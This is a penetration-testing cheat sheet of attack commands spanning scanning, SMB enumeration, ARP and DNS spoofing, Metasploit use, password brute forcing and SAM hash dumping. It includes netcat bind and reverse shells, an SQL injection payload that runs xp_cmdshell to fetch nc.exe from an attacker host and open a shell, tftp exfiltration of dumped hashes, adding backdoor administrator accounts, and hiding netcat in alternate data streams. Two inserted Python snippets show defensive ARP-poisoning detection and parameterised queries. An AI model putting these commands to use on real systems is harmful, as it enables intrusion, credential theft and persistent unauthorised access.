
More Hacking Notes


Contents:
Networking
Services
Basics
Footprinting
Scanning
Windows Enumeration
ARP Spoofing
Exploits
Metasploit Framework 3
What to do after gaining a remote shell
TFTP
Netcat
Passwords
Physical Access
SQL Injection
Alternate Data Streams
A White Hat's Pen Test

Before you begin, change your root password using passwd.

Networking
dhcpcd                 -get a new IP address

Renew dynamic IP address:
dhcpcd -k              -release IP address
ifconfig eth0 up       -bring up the NIC
dhcpcd                 -get a new IP address

Static IP address:
ifconfig eth0 192.168.0.100/24                  -set IP address & subnet mask
route add default gw 192.168.0.1                -set default gateway
echo nameserver 192.168.0.1 > /etc/resolv.conf  -set DNS server

Services:
Apache server:
apachectl start             -start server on TCP port 80
apachectl stop              -stop server

SSH server:
sshd-generate               -generate ssh keys
/usr/sbin/sshd              -start server on TCP port 22
pkill sshd                  -stop server
ssh user@targetIP

TFTP server:
atftpd --daemon --port 69 /tmp/          -start server on UDP port 69 with a root directory of /tmp
pkill tftpd                              -stop server

VNC server:
vncserver                   -start server on TCP port 5901
pkill Xvnc                  -stop server

Check what ports are listening:
netstat -ant                             -show listening TCP ports
netstat -anu                             -show listening UDP ports
netstat -ant | grep 22                   -verify ssh has started
netstat -anu | grep 69                   -verify tftp has started

Basics

Mount a local hard drive:
mount /dev/hda1 /mnt/hda1
ls -l /mnt/hda1

Mount a Windows network share:
share <user> <targetIP> <remote share>
share admin 10.1.1.2 c$
Enter a password for the remote share.
ls -l /mnt/share/
umount /mnt/share                  -unmount share

Edit a file:
nano test.sh                 -create a new file and open it
<ctrl> x                     -exit
Y                            -save modified buffer
<enter>                      -write changes
chmod 755 test.sh            -make the file executable
./test.sh                    -run the file

Compile a program:
gcc -o newname exploit.c
gcc -o dcom 66.c
./dcom

Install a new program:
tar zxvf program.tar.gz                       -method 2:  bzip2 -cd program.tar.bz2 | tar xvf -
cd to the new program folder
./configure
make
su root
make install

Footprinting
Whois:
whois target.com                     -contact info, emails, dates, name servers
ping www.target.com                  -IP address of web server
whois targetIP                       -network range

DNS:
dig target.com any                   -all records; or ask for one record type: A, PTR, NS, SOA, SRV, MX

host -l target.com <name server>     -zone transfer
Scanning

scanrand -b10M targetIP:quick
nmap:
-sS                   - TCP SYN scan or Stealth, half open (default)
-sU                   - UDP scan
-sT                   - TCP full connect (very noisy)
-PN                   - don't ping
-n                    - no reverse DNS lookup
-A                    - combines -O and -sV
-O                    - OS fingerprinting
-sV                   - service version (banner)
-p                    - ports to scan (T:port,U:port)
-T                    - timing (0-5) paranoid, sneaky, polite, normal, aggressive, insane
-iL                   - input list of hosts to scan
-oG                   - grepable output to a file
nmap -sS -PN -n targetIP
nmap -sU -PN -n targetIP
nmap -sT -PN -n targetIP -A -p <open ports> -T5 -oG scan.txt
nmap -sS -p 135,139,445 targetIP
nmap -sS -p T:1433,U:1434 targetIP

AMAP:
Take the results from nmap and check for services on uncommon ports.
amap -i scan.txt

OS Fingerprinting:

p0f -i eth0 -U -p                     - use interface eth0, don't display unknown signatures, promiscuous
point a browser to the targetIP       - read traffic on p0f
xprobe2 -B targetIP

Banner Grabbing

nc targetIP port                      - check if the port is open
nc 10.1.1.2 80

telnet targetIP port                  - telnet may yield slightly different results
HEAD / HTTP/1.0
<enter 2x>

wget targetIP                         - downloads the index.html file
cat index.html | more                 - view file one page at a time, space bar for next page
q                                     - quit or get out of the file


Windows Enumeration

nmap -sS -p 139,445 targetIP

cd /pentest/enumeration/smb-enum
nbtscan -f targetIP                  - check to see if NetBIOS is enabled
smbgetserverinfo -i targetIP         - name, OS and workgroup
smbdumpusers -i targetIP             - list users
smbclient -L //targetIP              - list shares

Using Windows
net use \\targetIP\ipc$ "" /u:""                        - start a NULL session
net view \\targetIP                                     - view shares

smbclient:
smbclient -L hostName -I targetIP                 - enumerate shares
smbclient -L hostName/share -U ""                 - connect to open share with a blank user name
smbclient -L hostName -I targetIP -U admin        - connect to open share with user name admin

RPCclient
rpcclient targetIP -U ""           - start a NULL session
netshareenum                       - enumerate shares
enumdomusers                       - enumerate users
lsaenumsid                         - enumerate domain SIDs
queryuser RID                      - user info, try 500, 501, 1000, 1001
createdomuser                      - create user account

ARP Spoofing

ettercap:
nano /usr/local/etc/etter.conf
Under the Linux section, uncomment both lines under iptables.

Sniff > Unified sniffing > Network interface: eth0 > OK
Hosts > Scan for hosts (do this 2 times)
Hosts > Hosts list
Select the default gateway > Add to Target 1
Select the target > Add to Target 2
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing

dsniff -i eth0
urlsnarf -i eth0
msgsnarf -i eth0
driftnet -i eth0

dns spoofing:
nano /usr/local/share/ettercap/etter.dns
Edit the Microsoft lines (target URL) to redirect to the attacker.

Plugins > Manage the plugins > dns_spoof
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing
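An added defender-side check, not from the original notes: after the ARP poisoning above, the victim's ARP cache shows the gateway and the attacker's host resolving to the same MAC. The Python below parses `arp -an` style output, flags any MAC claimed by more than one IP, and compares the gateway entry against a recorded baseline; the sample table and the baseline MAC are constructed.

```python
import re
from collections import defaultdict

# Constructed `arp -an` output as seen on a poisoned victim: the gateway
# 192.168.0.1 and host 192.168.0.50 now both resolve to the same MAC.
SAMPLE_ARP = """\
? (192.168.0.1) at 00:50:56:aa:bb:01 [ether] on eth0
? (192.168.0.50) at 00:50:56:aa:bb:01 [ether] on eth0
? (192.168.0.77) at 00:0c:29:12:34:56 [ether] on eth0
? (192.168.0.2) at <incomplete> on eth0
"""

# Known-good gateway MAC recorded while the network was healthy (constructed).
BASELINE = {"192.168.0.1": "00:50:56:00:00:01"}

ARP_RE = re.compile(r"^\S+ \((?P<ip>[\d.]+)\) at (?P<mac>[0-9a-f:]{17}) ")

def parse_arp(text):
    """Return {ip: mac} from `arp -an` style lines; incomplete entries are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_RE.match(line.lower())
        if m:
            table[m["ip"]] = m["mac"]
    return table

def duplicate_macs(table):
    """MACs claimed by more than one IP, the signature of a poisoned cache."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def baseline_changes(table, baseline):
    """IPs whose MAC differs from the recorded baseline: {ip: (expected, seen)}."""
    return {ip: (mac, table[ip]) for ip, mac in baseline.items()
            if ip in table and table[ip] != mac}

def check(text, baseline=BASELINE):
    """Return human-readable alerts for one ARP table snapshot."""
    table = parse_arp(text)
    alerts = [f"MAC {mac} is claimed by {len(ips)} IPs: {', '.join(ips)}"
              for mac, ips in duplicate_macs(table).items()]
    alerts += [f"{ip} moved from {old} to {new}"
               for ip, (old, new) in baseline_changes(table, baseline).items()]
    return alerts

if __name__ == "__main__":
    for alert in check(SAMPLE_ARP):
        print("ALERT:", alert)
```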

Exploits
cd /pentest/exploits/milw0rm
cat sploitlist.txt | grep -i exploit

Some exploits may be written for compilation under Windows, while others for Linux.
You can identify the environment by inspecting the headers.
cat exploit | grep "#include"

Windows:  process.h, string.h, winbase.h, windows.h, winsock2.h
Linux:    arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h

Grep out Windows headers, to leave only Linux based exploits:
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u

Metasploit Framework 3

svn update                   -module updates.

Web Interface:
./msfweb                     -opens a browser at http://127.0.0.1:55555

Console:
./msfconsole
help
show exploits                -show all exploits
search <name>                -search for an exploit

use <exploit name>
show options
set <OPTION NAME> <option>                  -set RHOST 10.1.1.2
show payloads
set PAYLOAD <payload name>
show options
set <OPTION NAME> <option>                  -set LHOST 10.1.1.2
show targets
set TARGET <target number>                  -set TARGET 0
exploit                      -you may need to run the exploit more than once for it to work

sessions -l                  -list all sessions
sessions -i <id>             -sessions -i 4, interact with session 4
<ctrl> z                     -detach from session
<ctrl> c                     -kill a session
jobs                         -list exploit jobs running
jobs -K                      -kill all jobs
Auxiliary scanners:
show auxiliary
use <auxiliary name>
set <OPTION NAME> <option>
run

scanner/discovery/sweep_udp
scanner/smb/version
scanner/mssql/mssql_ping
scanner/mssql/mssql_login

Payloads:
Attacker behind firewall:  bind shell
Target behind firewall:    reverse shell


Automated:
db_import_nessus_nbe                       -import Nessus results in NBE format
db_import_nmap_xml                         -import nmap results in XML format (-oX)

./start-db-autopwn
su - postgres
cd /pentest/exploit/framework3
./msfconsole
load db_postgres
db_create
db_nmap targetIP                   -run nmap through the framework and store results in the database
db_hosts                           -show hosts discovered
db_services                        -show services running on each host
db_autopwn                         -show options
db_autopwn -t -p -e                -select modules based on open ports, show matching exploits, exploit

Command Line Interface:
./msfcli | grep -i <name>                                 -search for an exploit or auxiliary
./msfcli <exploit or auxiliary> S                      -summary info
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E

Payload generator:
./msfpayload <payload> <variable=value> <output type>
S        summary and options of payload
C        C language
P        Perl
Y        Ruby
R        Raw, allows payload to be piped into msfencode and other tools
J        JavaScript
X        executable (Windows only)

./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C

Encode shellcode:
./msfencode <options> <variable=value>

Pipe the output of msfpayload into msfencode, specify bad characters and list available encoders.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l

Choose the PexFnstenvMor encoder and format the output to C.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor -t c


What to do after gaining a remote shell

hostname                    -name of computer
net users                   -list users
net user x hack /add        -add user "x" with password "hack"
net user x /add             -add user "x" with NO password
net localgroup              -list security groups
net localgroup administrators              -list users in Administrators group
net localgroup administrators x /add       -add user "x" to Administrators group

Don't use interactive programs like FTP from a remote shell.


TFTP

attack box 10.1.1.2
cp /pentest/windows-binaries/tools/nc.exe /tmp/

target box
tftp -i 10.1.1.2 GET nc.exe

TFTP copies files with read only attributes.  So to delete the file:
        attrib -r nc.exe
        del nc.exe

Netcat

attacker:  10.1.1.1
target:  10.1.1.2

Port scanner:
nc -v -z 10.1.1.2 1-1024                      -scan port 1 to 1024

Chat session:
target:  nc -lvp 4444               - start Netcat and listen verbosely on port 4444
attacker:  nc -v 10.1.1.2 4444

Transfer file to target:
target:  nc -lvp 4444 > output.txt
attacker:  nc -v 10.1.1.2 4444 < test.txt

Bind shell:
target:  nc -lvp 4444 -e cmd.exe         -should be sitting at a command prompt of the target
attacker:  nc -v 10.1.1.2 4444

Reverse shell:
target:  nc -lvp 4444
attacker:  nc -v 10.1.1.2 4444 -e /bin/bash
The target should be sitting at an invisible command prompt of the attacker.
You will not see a prompt.  Issue any linux command to verify.

Passwords
Word list:
zcat /pentest/password/dictionaries/wordlist.txt.Z > words
cat words | wc -l
About 306,000 passwords.

Brute force:
ftp with a user name ftp
hydra -l ftp -P words -v targetIP ftp

pop3 with a user name muts
hydra -l muts -P words -v targetIP pop3

snmp
hydra -P words -v targetIP snmp

Microsoft VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP

WYD:
Use wget to download specific files.
wget -r www.target.com --accept=pdf           -f switch will read pwdump files
wyd.pl -o output.txt www.target.com/
cat output.txt | more

SAM file:
%SYSTEMROOT%/system32/config            -backup copy not locked by the OS
%SYSTEMROOT%/repair


Dumping hashes:
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\
meterpreter > execute -f cmd -c
meterpreter > interact x                       -where x is the channel created
C:\WINDOWS\system32> pwdump \\127.0.0.1

John the Ripper:
Paste the hashes into a new file.
nano hash.txt
Delete unneeded accounts.
cp hash.txt /pentest/password/john-1.7.2/run/
cd /pentest/password/john-1.7.2/run/
./john hash.txt

Rainbow Tables:
rcrack *.rt -f hash.txt

Physical Access

Mount an NTFS partition in read/write mode:
Boot your box with Backtrack.
mount
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount
ls -l /mnt/hda1

Dump the SAM file:
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt
cat hash.txt

Modify SAM file directly:
chntpw /mnt/sda1/WINDOWS/system32/config/SAM
Blank the password.  *
Do y'all actually wishing to modify it?  y
Write hive files?  y
umount /mnt/sda1
reboot

SQL Injection

nmap -sS -p 1521 targetIP                     -Oracle
nmap -sS -p T:1433,U:1434 targetIP            -MS SQL

Release                 Version of Sqlservr.exe
SQL Server 2000 RTM     2000.80.194.0
SQL Server 2000 SP1     2000.80.383.0
SQL Server 2000 SP2     2000.80.534.0
SQL Server 2000 SP3     2000.80.760.0
SQL Server 2000 SP3a    2000.80.760.0
SQL Server 2000 SP4     2000.80.00.2039
SQL Server 2005 RTM     2005.90.1399
SQL Server 2005 SP1     2005.90.2047
SQL Server 2005 SP2     2005.90.3042

Authentication bypass:
' or 1=1--                                 -minus minus closes the SQL query, everything after it is ignored
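Added example, not part of the original notes: the bypass above works only because the login query is built by string concatenation. The Python below (an in-memory SQLite table standing in for the login table, all rows constructed) shows the vulnerable query beside the parameterised form that treats the same input as a plain user name.

```python
import sqlite3

def make_db():
    """Constructed in-memory users table standing in for the target's login table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!'), ('bob', 'hunter2')")
    return conn

def login_vulnerable(conn, user, pw):
    """Query built by string concatenation. With user = ' or 1=1-- the quote ends
    the name literal, OR 1=1 makes the WHERE clause always true and -- comments
    out the password check, so every row comes back."""
    sql = ("SELECT name FROM users WHERE name = '" + user +
           "' AND password = '" + pw + "'")
    return [row[0] for row in conn.execute(sql)]

def login_safe(conn, user, pw):
    """Parameterised query: the driver passes values separately from the SQL text,
    so ' or 1=1-- is compared as a literal user name and matches nothing."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (user, pw))]

if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"
    print("vulnerable:", login_vulnerable(db, payload, "x"))   # every user
    print("safe:      ", login_safe(db, payload, "x"))         # []
```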

Enumerating table names:
' having 1=1--
' group by table having 1=1--
' group by table, table2 having 1=1--
' group by table, table2, table3 having 1=1--

Enumerating column types:
union select sum(column) from table --
union select sum(column2) from table --

Adding data:
' ; insert into table values('value','value2','value3')--

MS SQL stored procedure:
Output the database information into an html file that you can view with a browser.
' ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; --

Run ipconfig on target and write to a file that you can view with a browser.
' or 1=1; exec master..xp_cmdshell ' "ipconfig" > c:\Inetpub\wwwroot\test.txt' ;--

Upload netcat and spawn a reverse shell.
' or 1=1; exec master..xp_cmdshell ' "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe' ; --
attacker:  nc -lvp 53

Alternate Data Streams

Hide netcat inside a text file.  Note netcat must be located in the current directory.
echo "This is a test" > test.txt
type nc.exe > test.txt:nc.exe
del nc.exe
start ./test.txt:nc.exe

A White Hat's Pen Test by Muts

nslookup
set type=ns
set type=mx
nmap -sS
nmap -sU
nc -v target.com 23
snmpenum

Solarwinds
tftp the router config file

Use a perl script to decrypt the passwords
Find internal mail server in config file.

nc -n internalserver.com 80

Edit config file to open more ports on the router, 135,139,445,1000
Use Metasploit to send RPC exploit
tftp -i attackIP GET pwdump4.exe
pwdump4.exe \\127.0.0.1>hashes.txt
tftp -i attackIP PUT hashes.txt
Crack hashes with rainbow table.
Use Remote Desktop to connect to server.


Hope it comes in handy in times of need!